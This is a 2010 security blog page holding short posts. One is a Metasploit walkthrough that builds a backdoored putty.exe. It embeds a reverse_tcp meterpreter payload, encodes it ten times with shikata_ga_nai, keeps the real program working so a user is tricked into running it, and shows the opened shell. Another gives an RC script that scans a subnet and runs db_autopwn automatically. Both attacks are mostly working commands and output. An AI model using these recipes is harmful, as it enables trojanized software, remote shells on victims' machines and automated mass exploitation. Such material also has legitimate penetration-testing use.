Motorola Droid
- April 19th, 2010
- Write comment
Posting from my laptop tethered to my new Motorola Droid. This phone is sick. Now my only regret is how long I waited to get it!
Posting from my laptop tethered to my new Motorola Droid. This phone is sick. Now my only regret is how long I waited to get it!
SSL tunneled meterpreter sessions, Thanks HD.
So I’m writing my GCIA Gold paper on Network Data Visualization for Computer Network Defense. More than likely I’ll be posting some stuff regarding the research. Right now I am focusing on Open Source tools found on the DAVIX distribution. Anyone out there with some experience on the subject I would love to pick your brain.
For a while now it has been possible to add msfencoded payloads into executable. However the resulting files would not work as expected. ie You could trick a user into running a file which would in turn give you a meterpreter session but the user would soon find that something was amiss with the exe……not any more.
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896
./msfencode -h
Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: ‘\x00\xff’
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=31337 R | ./msfencode -x putty.exe -t exe -k -o putty_backdoored.exe -e x86/shikata_ga_nai -c 10
[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 477 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 504 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 531 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 558 (iteration=10
file putty_backdoored.exe
putty_backdoored.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.199.129
LHOST => 192.168.199.129
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.199.129:31337
[*] Starting the payload handler…
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.199.129:31337 -> 192.168.199.130:50766)
You’ll still need to migrate or your shell will terminate when the backdoored process is killed
I just saw this on seclists.org.
HD Moore posted this to kick off db_autopwn via msfconsole RC script
$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r
$ msfconsole -r ownitall.rc